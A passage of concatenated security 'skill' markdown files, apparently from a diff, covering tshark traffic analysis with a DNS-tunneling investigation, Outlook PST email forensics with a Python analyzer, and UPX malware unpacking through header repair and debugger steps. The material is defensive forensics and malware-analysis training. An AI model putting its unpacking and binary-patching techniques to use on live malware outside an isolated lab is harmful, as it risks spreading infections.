# Export SMB objects (files transferred over SMB)
|
||||
tshark -r capture.pcapng --export-objects smb,/tmp/smb_objects/
|
||||
|
||||
# Extract all unique destination IPs for threat intelligence lookup
|
||||
tshark -r capture.pcapng -T fields -e ip.dst | sort -u > unique_dest_ips.txt
|
||||
|
||||
# Extract SSL/TLS certificate information
|
||||
tshark -r capture.pcapng -Y "tls.handshake.type == 11" -T fields -e x509sat.uTF8String -e x509ce.dNSName
|
||||
|
||||
# Extract all URLs accessed
|
||||
tshark -r capture.pcapng -Y "http.request" -T fields -e http.host -e http.request.uri | sort -u > urls.txt
|
||||
|
||||
# Hash extracted files for IOC matching
|
||||
find /tmp/http_objects/ -type f -exec sha256sum {} \; > extracted_file_hashes.txt
|
||||
```
|
||||
|
||||
### Step 5: Statistical Analysis and Anomaly Detection
|
||||
|
||||
```bash
|
||||
# Protocol hierarchy statistics
|
||||
tshark -r capture.pcapng -q -z io,phs
|
||||
|
||||
# Conversation statistics sorted by bytes
|
||||
tshark -r capture.pcapng -q -z conv,tcp -z conv,udp
|
||||
|
||||
# Identify top talkers
|
||||
tshark -r capture.pcapng -q -z endpoints,ip
|
||||
|
||||
# IO graph data (packets per second)
|
||||
tshark -r capture.pcapng -q -z io,stat,1,"COUNT(frame) frame"
|
||||
|
||||
# Detect port scanning patterns
|
||||
tshark -r capture.pcapng -Y "tcp.flags.syn == 1 and tcp.flags.ack == 0" -T fields -e ip.src -e tcp.dstport | sort | uniq -c | sort -rn | head -20
|
||||
```
|
||||
|
||||
### Step 6: Generate Reports and Export Evidence
|
||||
|
||||
```bash
|
||||
# Export filtered packets to a new PCAP for evidence preservation
|
||||
tshark -r capture.pcapng -Y "ip.addr == 10.10.5.23 and tcp.port == 4444" -w evidence_c2_traffic.pcapng
|
||||
|
||||
# Generate packet summary in CSV format
|
||||
tshark -r capture.pcapng -T fields -E header=y -E separator=, -e frame.number -e frame.time -e ip.src -e ip.dst -e ip.proto -e tcp.srcport -e tcp.dstport -e frame.len > traffic_summary.csv
|
||||
|
||||
# Create PDML (XML) output for programmatic analysis
|
||||
tshark -r capture.pcapng -T pdml > capture_analysis.xml
|
||||
|
||||
# Calculate capture file hash for chain of custody
|
||||
sha256sum capture.pcapng > capture_hash.txt
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Capture Filter (BPF)** | Berkeley Packet Filter syntax applied at capture time to limit which packets are recorded, reducing file size and improving performance |
|
||||
| **Display Filter** | Wireshark-specific filter syntax applied to already-captured packets for focused analysis without altering the capture file |
|
||||
| **PCAPNG** | Next-generation packet capture format supporting multiple interfaces, name resolution, annotations, and metadata in a single file |
|
||||
| **TCP Stream** | Reassembled sequence of TCP segments representing a complete bidirectional conversation between two endpoints |
|
||||
| **Protocol Dissector** | Wireshark module that decodes a specific protocol's fields and structure, enabling deep inspection of packet contents |
|
||||
| **IO Graph** | Time-series visualization of packet or byte rates over the capture duration, useful for identifying traffic spikes or beaconing |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Wireshark 4.0+**: GUI-based packet analyzer with protocol dissectors for 3,000+ protocols, stream reassembly, and export capabilities
|
||||
- **tshark**: Command-line version of Wireshark for headless capture, batch processing, and scripted analysis pipelines
|
||||
- **tcpdump**: Lightweight packet capture tool for quick captures on remote systems without GUI dependencies
|
||||
- **mergecap**: Wireshark utility for combining multiple capture files into a single PCAP for unified analysis
|
||||
- **editcap**: Wireshark utility for splitting, filtering, and converting between capture file formats
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Suspected Data Exfiltration via DNS Tunneling
|
||||
|
||||
**Context**: The SOC team detected unusually high DNS query volumes from a workstation (10.10.3.45) to an external domain. The SIEM alert flagged DNS queries averaging 200 per minute compared to the baseline of 15. A packet capture was initiated from the network tap on the workstation's VLAN.
|
||||
|
||||
**Approach**:
|
||||
1. Capture traffic from the workstation's subnet using `tshark -i eth2 -f "host 10.10.3.45 and port 53" -w dns_exfil_investigation.pcapng`
|
||||
2. Analyze DNS query patterns: `tshark -r dns_exfil_investigation.pcapng -Y "dns.qry.name contains \"suspect-domain.xyz\"" -T fields -e frame.time -e dns.qry.name`
|
||||
3. Examine subdomain labels for encoded data (long base64-like subdomains indicate tunneling): `tshark -r dns_exfil_investigation.pcapng -Y "dns.qry.type == 16" -T fields -e dns.qry.name -e dns.txt`
|
||||
4. Calculate data volume by summing query name lengths to estimate exfiltration bandwidth
|
||||
5. Extract unique query names and decode base64 subdomains to recover exfiltrated content
|
||||
6. Export evidence packets to a separate PCAP and generate SHA-256 hash for chain of custody
|
||||
|
||||
**Pitfalls**:
|
||||
- Capturing unfiltered traffic on a busy network and running out of disk space before collecting relevant data
|
||||
- Using display filters instead of capture filters, resulting in massive files that are slow to process
|
||||
- Overlooking encrypted DNS (DoH/DoT) traffic that bypasses traditional DNS capture on port 53
|
||||
- Failing to establish packet capture hash and chain of custody documentation for forensic evidence
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
## Traffic Analysis Report
|
||||
|
||||
**Case ID**: IR-2024-0847
|
||||
**Capture File**: dns_exfil_investigation.pcapng
|
||||
**SHA-256**: a3f2b8c1d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
|
||||
**Duration**: 2024-03-15 14:00:00 to 14:45:00 UTC
|
||||
**Source Interface**: eth2 (VLAN 30 span port)
|
||||
|
||||
### Findings
|
||||
|
||||
**1. DNS Tunneling Confirmed**
|
||||
- Source: 10.10.3.45
|
||||
- Destination DNS: 8.8.8.8 (forwarded to ns1.suspect-domain.xyz)
|
||||
- Query volume: 9,247 queries in 45 minutes (205/min vs 15/min baseline)
|
||||
- Average subdomain label length: 63 characters (base64-encoded data)
|
||||
- Estimated data exfiltrated: ~2.3 MB via TXT record responses
|
||||
|
||||
**2. Indicators of Compromise**
|
||||
- Domain: suspect-domain.xyz (registered 3 days prior)
|
||||
- Nameserver: ns1.suspect-domain.xyz (203.0.113.50)
|
||||
- Query pattern: TXT record requests with base64-encoded subdomains
|
||||
- Response pattern: TXT records containing base64-encoded payloads
|
||||
```
|
||||
@@ -0,0 +1,241 @@
|
||||
---
|
||||
name: analyzing-outlook-pst-for-email-forensics
|
||||
description: Analyze Microsoft Outlook PST and OST files for email forensic evidence including message content, headers, attachments, deleted items, and metadata using libpff, pst-utils, and forensic email analysis tools for legal investigations and incident response.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [email-forensics, pst, ost, outlook, mapi, email-headers, attachments, deleted-emails, libpff, eml-extraction]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Outlook PST for Email Forensics
|
||||
|
||||
## Overview
|
||||
|
||||
Microsoft Outlook PST (Personal Storage Table) and OST (Offline Storage Table) files are critical evidence sources in digital forensics investigations. PST files store email messages, calendar events, contacts, tasks, and notes in a proprietary binary format based on the MAPI (Messaging Application Programming Interface) property system. Forensic analysis of these files enables recovery of deleted emails (from the Recoverable Items folder), extraction of email headers for tracing message routes, analysis of attachments for malware or exfiltrated data, and reconstruction of communication patterns. Modern PST files use Unicode format with 4KB pages and can grow up to 50GB, while legacy ANSI format is limited to 2GB.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- libpff/pffexport (open-source PST parser)
|
||||
- Python 3.8+ with pypff or libratom libraries
|
||||
- MailXaminer, Forensic Email Collector, or SysTools PST Forensics (commercial)
|
||||
- Microsoft Outlook (optional, for native PST access)
|
||||
- Sufficient disk space for extracted content
|
||||
|
||||
## PST File Locations
|
||||
|
||||
| Source | Path |
|
||||
|--------|------|
|
||||
| Outlook 2016+ Default | %USERPROFILE%\Documents\Outlook Files\*.pst |
|
||||
| Outlook Legacy | %LOCALAPPDATA%\Microsoft\Outlook\*.pst |
|
||||
| OST Cache | %LOCALAPPDATA%\Microsoft\Outlook\*.ost |
|
||||
| Archive | %USERPROFILE%\Documents\Outlook Files\archive.pst |
|
||||
|
||||
## Analysis with Open-Source Tools
|
||||
|
||||
### libpff / pffexport
|
||||
|
||||
```bash
|
||||
# Export all items from PST file
|
||||
pffexport -m all evidence.pst -t exported_pst
|
||||
|
||||
# Export only email messages
|
||||
pffexport -m items evidence.pst -t exported_emails
|
||||
|
||||
# Export recovered/deleted items
|
||||
pffexport -m recovered evidence.pst -t recovered_items
|
||||
|
||||
# Get PST file information
|
||||
pffinfo evidence.pst
|
||||
```
|
||||
|
||||
### Python PST Analysis
|
||||
|
||||
```python
|
||||
import pypff
|
||||
import os
|
||||
import json
|
||||
import hashlib
|
||||
import email
|
||||
import sys
|
||||
from datetime import datetime
|
||||
from collections import defaultdict
|
||||
|
||||
|
||||
class PSTForensicAnalyzer:
|
||||
"""Forensic analysis of Outlook PST/OST files."""
|
||||
|
||||
def __init__(self, pst_path: str, output_dir: str):
|
||||
self.pst_path = pst_path
|
||||
self.output_dir = output_dir
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
self.pst = pypff.file()
|
||||
self.pst.open(pst_path)
|
||||
self.messages = []
|
||||
self.attachments = []
|
||||
self.stats = defaultdict(int)
|
||||
|
||||
def process_folder(self, folder, folder_path: str = ""):
|
||||
"""Recursively process PST folders and extract messages."""
|
||||
folder_name = folder.name or "Root"
|
||||
current_path = f"{folder_path}/{folder_name}" if folder_path else folder_name
|
||||
|
||||
for i in range(folder.number_of_sub_messages):
|
||||
try:
|
||||
message = folder.get_sub_message(i)
|
||||
msg_data = self.extract_message(message, current_path)
|
||||
if msg_data:
|
||||
self.messages.append(msg_data)
|
||||
self.stats["total_messages"] += 1
|
||||
except Exception as e:
|
||||
self.stats["parse_errors"] += 1
|
||||
|
||||
for i in range(folder.number_of_sub_folders):
|
||||
try:
|
||||
subfolder = folder.get_sub_folder(i)
|
||||
self.process_folder(subfolder, current_path)
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
def extract_message(self, message, folder_path: str) -> dict:
|
||||
"""Extract forensic metadata from a single email message."""
|
||||
msg_data = {
|
||||
"folder": folder_path,
|
||||
"subject": message.subject or "",
|
||||
"sender": message.sender_name or "",
|
||||
"sender_email": "",
|
||||
"creation_time": str(message.creation_time) if message.creation_time else None,
|
||||
"delivery_time": str(message.delivery_time) if message.delivery_time else None,
|
||||
"modification_time": str(message.modification_time) if message.modification_time else None,
|
||||
"has_attachments": message.number_of_attachments > 0,
|
||||
"attachment_count": message.number_of_attachments,
|
||||
"body_size": len(message.plain_text_body or b""),
|
||||
"html_size": len(message.html_body or b""),
|
||||
}
|
||||
|
||||
# Extract transport headers for routing analysis
|
||||
headers = message.transport_headers
|
||||
if headers:
|
||||
msg_data["headers_present"] = True
|
||||
msg_data["headers_size"] = len(headers)
|
||||
# Parse key headers
|
||||
parsed = email.message_from_string(headers)
|
||||
msg_data["from_header"] = parsed.get("From", "")
|
||||
msg_data["to_header"] = parsed.get("To", "")
|
||||
msg_data["date_header"] = parsed.get("Date", "")
|
||||
msg_data["message_id"] = parsed.get("Message-ID", "")
|
||||
msg_data["x_originating_ip"] = parsed.get("X-Originating-IP", "")
|
||||
msg_data["received_headers"] = parsed.get_all("Received", [])
|
||||
|
||||
# Process attachments
|
||||
for j in range(message.number_of_attachments):
|
||||
try:
|
||||
attachment = message.get_attachment(j)
|
||||
att_data = {
|
||||
"message_subject": msg_data["subject"],
|
||||
"name": attachment.name or f"attachment_{j}",
|
||||
"size": attachment.size,
|
||||
"content_type": "",
|
||||
}
|
||||
self.attachments.append(att_data)
|
||||
self.stats["total_attachments"] += 1
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
return msg_data
|
||||
|
||||
def save_attachments(self, max_size_mb: int = 100):
|
||||
"""Export attachments to disk for analysis."""
|
||||
att_dir = os.path.join(self.output_dir, "attachments")
|
||||
os.makedirs(att_dir, exist_ok=True)
|
||||
|
||||
root = self.pst.get_root_folder()
|
||||
self._save_attachments_recursive(root, att_dir, max_size_mb)
|
||||
|
||||
def _save_attachments_recursive(self, folder, att_dir, max_size_mb):
|
||||
for i in range(folder.number_of_sub_messages):
|
||||
try:
|
||||
message = folder.get_sub_message(i)
|
||||
for j in range(message.number_of_attachments):
|
||||
att = message.get_attachment(j)
|
||||
if att.size and att.size < max_size_mb * 1024 * 1024:
|
||||
name = att.name or f"unknown_{i}_{j}"
|
||||
safe_name = "".join(c if c.isalnum() or c in ".-_" else "_" for c in name)
|
||||
path = os.path.join(att_dir, safe_name)
|
||||
try:
|
||||
data = att.read_buffer(att.size)
|
||||
with open(path, "wb") as f:
|
||||
f.write(data)
|
||||
except Exception:
|
||||
continue
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
for i in range(folder.number_of_sub_folders):
|
||||
try:
|
||||
self._save_attachments_recursive(folder.get_sub_folder(i), att_dir, max_size_mb)
|
||||
except Exception:
|
||||
continue
|
||||
|
||||
def generate_report(self) -> str:
|
||||
"""Generate comprehensive PST forensic analysis report."""
|
||||
root = self.pst.get_root_folder()
|
||||
self.process_folder(root)
|
||||
|
||||
report = {
|
||||
"analysis_timestamp": datetime.now().isoformat(),
|
||||
"pst_file": self.pst_path,
|
||||
"pst_size_bytes": os.path.getsize(self.pst_path),
|
||||
"statistics": dict(self.stats),
|
||||
"messages": self.messages[:500],
|
||||
"attachments": self.attachments[:200],
|
||||
}
|
||||
|
||||
report_path = os.path.join(self.output_dir, "pst_forensic_report.json")
|
||||
with open(report_path, "w") as f:
|
||||
json.dump(report, f, indent=2, default=str)
|
||||
|
||||
print(f"[*] Total messages: {self.stats['total_messages']}")
|
||||
print(f"[*] Total attachments: {self.stats['total_attachments']}")
|
||||
print(f"[*] Parse errors: {self.stats['parse_errors']}")
|
||||
return report_path
|
||||
|
||||
def close(self):
|
||||
self.pst.close()
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 3:
|
||||
print("Usage: python process.py <pst_file> <output_dir>")
|
||||
sys.exit(1)
|
||||
analyzer = PSTForensicAnalyzer(sys.argv[1], sys.argv[2])
|
||||
analyzer.generate_report()
|
||||
analyzer.close()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
```
|
||||
|
||||
## Email Header Analysis
|
||||
|
||||
Key headers for forensic investigation:
|
||||
|
||||
| Header | Forensic Value |
|
||||
|--------|---------------|
|
||||
| Received | Message routing chain (read bottom to top) |
|
||||
| X-Originating-IP | Sender's actual IP address |
|
||||
| Message-ID | Unique identifier for correlation |
|
||||
| Date | Send timestamp |
|
||||
| Return-Path | Bounce address (may differ from From) |
|
||||
| DKIM-Signature | Domain authentication signature |
|
||||
| Authentication-Results | SPF, DKIM, DMARC verification results |
|
||||
| X-Mailer | Email client used |
|
||||
|
||||
## References
|
||||
|
||||
- MailXaminer PST Forensics: https://www.mailxaminer.com/blog/outlook-pst-file-forensics/
|
||||
- libpff Documentation: https://github.com/libyal/libpff
|
||||
- PST File Format Specification: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/
|
||||
- SANS Email Forensics: https://www.sans.org/blog/email-forensics/
|
||||
@@ -0,0 +1,16 @@
|
||||
# Standards - Outlook PST Email Forensics
|
||||
## Standards
|
||||
- MS-PST: Outlook Personal Folders (.pst) File Format
|
||||
- MS-OXMSG: Outlook Item Message File Format
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques
|
||||
## Tools
|
||||
- libpff/pffexport: Open-source PST parser
|
||||
- pypff (Python): Python bindings for libpff
|
||||
- MailXaminer: Commercial email forensics
|
||||
- PST Walker: Email investigation software
|
||||
- Kernel Outlook PST Viewer: Free PST reader
|
||||
## Key Artifacts
|
||||
- Email headers (Received, X-Originating-IP, Message-ID)
|
||||
- Deleted items (Recoverable Items folder)
|
||||
- Attachments (malware, exfiltrated data)
|
||||
- Calendar events, contacts, tasks
|
||||
@@ -0,0 +1,19 @@
|
||||
# Workflows - PST Email Forensics
|
||||
## Workflow: Email Evidence Extraction
|
||||
```
|
||||
Acquire PST/OST files from evidence
|
||||
|
|
||||
Hash original files (SHA-256)
|
||||
|
|
||||
Export with pffexport (items + recovered)
|
||||
|
|
||||
Parse email headers for routing
|
||||
|
|
||||
Extract and hash attachments
|
||||
|
|
||||
Search for keywords across messages
|
||||
|
|
||||
Build communication timeline
|
||||
|
|
||||
Document findings with chain of custody
|
||||
```
|
||||
@@ -0,0 +1,299 @@
|
||||
---
|
||||
name: analyzing-packed-malware-with-upx-unpacker
|
||||
description: >
|
||||
Identifies and unpacks UPX-packed and other packed malware samples to expose the original
|
||||
executable code for static analysis. Covers both standard UPX unpacking and handling
|
||||
modified UPX headers that prevent automated decompression. Activates for requests involving
|
||||
malware unpacking, UPX decompression, packer removal, or preparing packed samples for analysis.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, unpacking, UPX, packing, static-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Packed Malware with UPX Unpacker
|
||||
|
||||
## When to Use
|
||||
|
||||
- Static analysis reveals high entropy sections and minimal imports indicating the binary is packed
|
||||
- PEiD, Detect It Easy, or PEStudio identifies UPX or another known packer
|
||||
- The import table contains only LoadLibrary and GetProcAddress (runtime import resolution typical of packed binaries)
|
||||
- You need to recover the original binary for proper disassembly and decompilation in Ghidra or IDA
|
||||
- Automated UPX decompression fails because the malware author modified UPX magic bytes or headers
|
||||
|
||||
**Do not use** when dealing with custom packers, VM-based protectors (Themida, VMProtect), or samples where dynamic unpacking via debugging is more appropriate.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- UPX (Ultimate Packer for eXecutables) installed (`apt install upx-ucl` or download from https://upx.github.io/)
|
||||
- Detect It Easy (DIE) for packer identification
|
||||
- Python 3.8+ with `pefile` library for manual header repair
|
||||
- x64dbg or x32dbg for manual unpacking when automated tools fail
|
||||
- PE-bear or CFF Explorer for PE header inspection and repair
|
||||
- Isolated analysis VM without network connectivity
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Packer
|
||||
|
||||
Determine if the sample is packed and identify the packer:
|
||||
|
||||
```bash
|
||||
# Check with Detect It Easy
|
||||
diec suspect.exe
|
||||
|
||||
# Check with UPX (test without unpacking)
|
||||
upx -t suspect.exe
|
||||
|
||||
# Python-based entropy and packer detection
|
||||
python3 << 'PYEOF'
|
||||
import pefile
|
||||
import math
|
||||
|
||||
pe = pefile.PE("suspect.exe")
|
||||
|
||||
print("Section Analysis:")
|
||||
for section in pe.sections:
|
||||
name = section.Name.decode().rstrip('\x00')
|
||||
entropy = section.get_entropy()
|
||||
raw = section.SizeOfRawData
|
||||
virtual = section.Misc_VirtualSize
|
||||
print(f" {name:8s} Entropy: {entropy:.2f} Raw: {raw:>8} Virtual: {virtual:>8}")
|
||||
|
||||
# Check for UPX section names
|
||||
section_names = [s.Name.decode().rstrip('\x00') for s in pe.sections]
|
||||
if 'UPX0' in section_names or 'UPX1' in section_names:
|
||||
print("\n[!] UPX section names detected")
|
||||
elif '.upx' in [s.lower() for s in section_names]:
|
||||
print("\n[!] UPX variant section names detected")
|
||||
|
||||
# Check import count (packed binaries have very few)
|
||||
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
|
||||
total_imports = sum(len(e.imports) for e in pe.DIRECTORY_ENTRY_IMPORT)
|
||||
print(f"\nTotal imports: {total_imports}")
|
||||
if total_imports < 10:
|
||||
print("[!] Very few imports - likely packed")
|
||||
else:
|
||||
print("\n[!] No import directory - heavily packed")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 2: Attempt Standard UPX Decompression
|
||||
|
||||
Try the built-in UPX decompression:
|
||||
|
||||
```bash
|
||||
# Standard UPX decompress
|
||||
upx -d suspect.exe -o unpacked.exe
|
||||
|
||||
# If UPX fails with "not packed by UPX" error, the headers may be modified
|
||||
# Verbose output for debugging
|
||||
upx -d suspect.exe -o unpacked.exe -v 2>&1
|
||||
|
||||
# Verify the unpacked file
|
||||
file unpacked.exe
|
||||
diec unpacked.exe
|
||||
```
|
||||
|
||||
### Step 3: Repair Modified UPX Headers
|
||||
|
||||
If standard decompression fails, repair tampered magic bytes:
|
||||
|
||||
```python
|
||||
# Repair modified UPX headers
|
||||
import struct
|
||||
|
||||
with open("suspect.exe", "rb") as f:
|
||||
data = bytearray(f.read())
|
||||
|
||||
# UPX magic bytes: "UPX!" (0x55505821)
|
||||
# Malware authors commonly modify these to prevent automatic unpacking
|
||||
|
||||
# Search for modified UPX signatures
|
||||
upx_magic = b"UPX!"
|
||||
modified_patterns = [b"UPX0", b"UPX\x00", b"\x00PX!", b"UPx!"]
|
||||
|
||||
# Find and restore section names
|
||||
pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
|
||||
num_sections = struct.unpack_from("<H", data, pe_offset + 6)[0]
|
||||
section_table_offset = pe_offset + 0x18 + struct.unpack_from("<H", data, pe_offset + 0x14)[0]
|
||||
|
||||
print(f"PE offset: 0x{pe_offset:X}")
|
||||
print(f"Number of sections: {num_sections}")
|
||||
print(f"Section table offset: 0x{section_table_offset:X}")
|
||||
|
||||
for i in range(num_sections):
|
||||
offset = section_table_offset + (i * 40)
|
||||
name = data[offset:offset+8]
|
||||
print(f"Section {i}: {name}")
|
||||
|
||||
# Restore UPX magic bytes in the binary
|
||||
# Search for the UPX header signature location (typically near the end of packed data)
|
||||
for i in range(len(data) - 4):
|
||||
if data[i:i+3] == b"UPX" and data[i+3] != ord("!"):
|
||||
print(f"Found modified UPX magic at offset 0x{i:X}: {data[i:i+4]}")
|
||||
data[i:i+4] = b"UPX!"
|
||||
print(f"Restored to: UPX!")
|
||||
|
||||
# Also restore section names if modified
|
||||
for i in range(num_sections):
|
||||
offset = section_table_offset + (i * 40)
|
||||
name = data[offset:offset+8].rstrip(b'\x00')
|
||||
if name in [b"UPX0", b"UPX1", b"UPX2"]:
|
||||
continue # Already correct
|
||||
# Check for common modifications
|
||||
if name.startswith(b"UP") or name.startswith(b"ux"):
|
||||
original = f"UPX{i}".encode().ljust(8, b'\x00')
|
||||
data[offset:offset+8] = original
|
||||
print(f"Restored section name at 0x{offset:X} to {original}")
|
||||
|
||||
with open("suspect_fixed.exe", "wb") as f:
|
||||
f.write(data)
|
||||
|
||||
print("\nFixed file written. Retry: upx -d suspect_fixed.exe -o unpacked.exe")
|
||||
```
|
||||
|
||||
### Step 4: Manual Unpacking with Debugger
|
||||
|
||||
When automated unpacking fails entirely, use dynamic unpacking:
|
||||
|
||||
```
|
||||
Manual UPX Unpacking with x64dbg:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
1. Load packed sample in x64dbg
|
||||
2. Run to the entry point (system breakpoint then F9)
|
||||
3. UPX unpacking stub pattern:
|
||||
a. PUSHAD (saves all registers)
|
||||
b. Decompression loop (processes packed sections)
|
||||
c. Resolves imports (LoadLibrary/GetProcAddress calls)
|
||||
d. POPAD (restores registers)
|
||||
e. JMP to OEP (original entry point)
|
||||
4. Set hardware breakpoint on ESP after PUSHAD:
|
||||
- After PUSHAD, right-click ESP in registers -> Follow in Dump
|
||||
- Set hardware breakpoint on access at [ESP] address
|
||||
- Run (F9) - breaks at POPAD before JMP to OEP
|
||||
5. Step forward (F7/F8) until you reach the JMP to OEP
|
||||
6. At OEP: Use Scylla plugin to dump and fix imports:
|
||||
- Plugins -> Scylla -> OEP = current EIP
|
||||
- Click "IAT Autosearch" -> "Get Imports"
|
||||
- Click "Dump" to save unpacked binary
|
||||
- Click "Fix Dump" to repair import table
|
||||
```
|
||||
|
||||
### Step 5: Validate Unpacked Binary
|
||||
|
||||
Verify the unpacked sample is valid and complete:
|
||||
|
||||
```bash
|
||||
# Verify unpacked PE is valid
|
||||
python3 << 'PYEOF'
|
||||
import pefile
|
||||
|
||||
pe = pefile.PE("unpacked.exe")
|
||||
|
||||
# Check sections are normal
|
||||
print("Unpacked Section Analysis:")
|
||||
for section in pe.sections:
|
||||
name = section.Name.decode().rstrip('\x00')
|
||||
entropy = section.get_entropy()
|
||||
print(f" {name:8s} Entropy: {entropy:.2f}")
|
||||
|
||||
# Verify imports are resolved
|
||||
print(f"\nImport count:")
|
||||
if hasattr(pe, 'DIRECTORY_ENTRY_IMPORT'):
|
||||
for entry in pe.DIRECTORY_ENTRY_IMPORT:
|
||||
dll = entry.dll.decode()
|
||||
count = len(entry.imports)
|
||||
print(f" {dll}: {count} functions")
|
||||
total = sum(len(e.imports) for e in pe.DIRECTORY_ENTRY_IMPORT)
|
||||
print(f" Total: {total} imports")
|
||||
|
||||
# Compare file sizes
|
||||
import os
|
||||
packed_size = os.path.getsize("suspect.exe")
|
||||
unpacked_size = os.path.getsize("unpacked.exe")
|
||||
print(f"\nPacked: {packed_size:>10} bytes")
|
||||
print(f"Unpacked: {unpacked_size:>10} bytes")
|
||||
print(f"Ratio: {unpacked_size/packed_size:.1f}x")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Packing** | Compressing or encrypting executable code to reduce file size and hinder static analysis; the binary contains an unpacking stub that restores code at runtime |
|
||||
| **UPX** | Ultimate Packer for eXecutables; open-source executable packer commonly abused by malware authors because it is free and effective |
|
||||
| **Original Entry Point (OEP)** | The real starting address of the malware code before packing; the unpacking stub decompresses code then jumps to the OEP |
|
||||
| **Import Reconstruction** | Process of rebuilding the import address table after dumping an unpacked process from memory using tools like Scylla or ImpRec |
|
||||
| **PUSHAD/POPAD** | x86 instructions that save/restore all general-purpose registers; UPX uses this pattern to preserve register state during unpacking |
|
||||
| **Section Entropy** | Randomness measure of PE section data; packed sections show entropy > 7.0 while normal code sections average 5.0-6.5 |
|
||||
| **Magic Bytes** | Signature bytes within a file identifying its format; UPX uses "UPX!" which malware authors modify to prevent automated decompression |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **UPX**: Open-source executable packer with built-in decompression capability for properly packed files
|
||||
- **Detect It Easy (DIE)**: Packer, compiler, and linker detection tool that identifies protection on PE, ELF, and Mach-O files
|
||||
- **x64dbg/x32dbg**: Open-source Windows debugger used for manual unpacking through dynamic execution and breakpoint-based OEP finding
|
||||
- **Scylla**: Import reconstruction tool integrated with x64dbg for rebuilding IAT after memory dumping
|
||||
- **PE-bear**: PE file viewer and editor for inspecting and repairing PE headers after unpacking
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Unpacking Malware with Modified UPX Headers
|
||||
|
||||
**Context**: A malware sample is identified as UPX-packed by section names (UPX0, UPX1) but `upx -d` fails with "CantUnpackException: header corrupted". The malware author modified the UPX magic bytes to prevent automated decompression.
|
||||
|
||||
**Approach**:
|
||||
1. Open the binary in a hex editor and search for the UPX header area (typically at the end of packed data)
|
||||
2. Identify the modified magic bytes (e.g., "UPX!" changed to "UPX\x00" or completely zeroed)
|
||||
3. Use the Python repair script to restore "UPX!" magic and correct section names
|
||||
4. Retry `upx -d` on the repaired binary
|
||||
5. If repair fails, fall back to manual unpacking with x64dbg (PUSHAD -> hardware BP on ESP -> POPAD -> JMP OEP)
|
||||
6. Validate the unpacked binary has proper imports and reasonable entropy values
|
||||
7. Import into Ghidra or IDA for full static analysis
|
||||
|
||||
**Pitfalls**:
|
||||
- Assuming UPX is the only packer; the binary may be double-packed (UPX + custom layer)
|
||||
- Modifying the original packed sample instead of working on a copy
|
||||
- Not reconstructing imports after manual memory dump (the dumped binary will crash without IAT fix)
|
||||
- Forgetting to check for overlay data appended after the UPX-packed PE sections
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
UNPACKING ANALYSIS REPORT
|
||||
===========================
|
||||
Sample: suspect.exe
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
Packer: UPX 3.96 (modified headers)
|
||||
|
||||
PACKED BINARY
|
||||
Sections: UPX0 (entropy: 0.00) UPX1 (entropy: 7.89) .rsrc (entropy: 3.45)
|
||||
Imports: 2 (kernel32.dll: LoadLibraryA, GetProcAddress)
|
||||
File Size: 98,304 bytes
|
||||
|
||||
UNPACKING METHOD
|
||||
Method: Header repair + UPX -d
|
||||
Header Fix: Restored UPX! magic at offset 0x1F000
|
||||
Command: upx -d suspect_fixed.exe -o unpacked.exe
|
||||
Result: SUCCESS
|
||||
|
||||
UNPACKED BINARY
|
||||
Sections: .text (entropy: 6.21) .rdata (entropy: 4.56) .data (entropy: 3.12) .rsrc (entropy: 3.45)
|
||||
Imports: 147 (kernel32, user32, advapi32, wininet, ws2_32)
|
||||
File Size: 245,760 bytes (2.5x expansion)
|
||||
OEP: 0x00401000
|
||||
|
||||
VALIDATION
|
||||
PE Valid: Yes
|
||||
Imports Resolved: Yes (147 functions across 8 DLLs)
|
||||
Executable: Yes (runs without crash in sandbox)
|
||||
|
||||
NEXT STEPS
|
||||
- Import unpacked.exe into Ghidra for full disassembly
|
||||
- Run YARA rules against unpacked binary
|
||||
- Submit unpacked binary to VirusTotal for improved detection
|
||||
```
|
||||
@@ -0,0 +1,341 @@
|
||||
---
|
||||
name: analyzing-pdf-malware-with-pdfid
|
||||
description: >
|
||||
Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded
|
||||
JavaScript, shellcode, exploits, and suspicious objects without opening the document.
|
||||
Determines the attack vector and extracts embedded payloads for further analysis.
|
||||
Activates for requests involving PDF malware analysis, malicious document analysis,
|
||||
PDF exploit investigation, or suspicious attachment triage.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, PDF-analysis, document-malware, PDFiD, static-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
